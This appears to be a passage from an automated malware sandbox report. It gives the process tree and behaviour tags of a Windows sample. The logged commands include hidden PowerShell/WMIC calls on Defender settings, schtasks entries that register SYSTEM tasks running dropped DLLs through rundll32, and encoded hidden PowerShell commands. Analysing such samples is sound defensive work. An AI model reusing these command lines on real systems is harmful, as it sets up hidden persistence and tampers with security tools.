C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1676 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1416
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\lExdmLMBU\wHsUjx.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "kRLTqYWysAZjVOw" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1604
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kRLTqYWysAZjVOw2" /F /xml "C:\Program Files (x86)\lExdmLMBU\TqEKbTe.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:764
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "kRLTqYWysAZjVOw"3⤵PID:1060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "kRLTqYWysAZjVOw"3⤵PID:1876
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ykUuPKxmqaQUII" /F /xml "C:\Program Files (x86)\PqbaBdNutUHU2\xTItakc.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:868
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ulpCfKOOGSKos2" /F /xml "C:\ProgramData\ypvfxRdiVpdIIEVB\UiIcUpp.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:112
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FvvOAjPOJzCKoDLGH2" /F /xml "C:\Program Files (x86)\vTGqftCYFnqsQTavPzR\yjEkrSQ.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1664
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WDMUNxCrfDqnCNrbnrT2" /F /xml "C:\Program Files (x86)\tcAZjUgKvOkyC\EUUntFm.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2248
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qZvWQJXUOVWXUoxnV" /SC once /ST 18:25:15 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\TtNtWPRQARDvDBvI\ahMvDhWI\KqPuAdO.dll\",#1 /cdidoEnc 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1892
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "qZvWQJXUOVWXUoxnV"3⤵PID:1500
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YoRBImjUnYbxcjeUQ"3⤵PID:1532
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\TtNtWPRQARDvDBvI\ahMvDhWI\KqPuAdO.dll",#1 /cdidoEnc 5254032⤵PID:1420
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\TtNtWPRQARDvDBvI\ahMvDhWI\KqPuAdO.dll",#1 /cdidoEnc 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2316 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qZvWQJXUOVWXUoxnV"4⤵PID:2084
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {F8A69052-3223-4C05-B489-279C5E3EB72D} S-1-5-21-481678230-3773327859-3495911762-1000:UIBNQNMA\Admin:Interactive:[1]1⤵PID:1132
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3056 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1236
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:876 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1544
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2712
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:944
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2736
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2680
Network
MITRE ATT&CK Enterprise v15
Downloads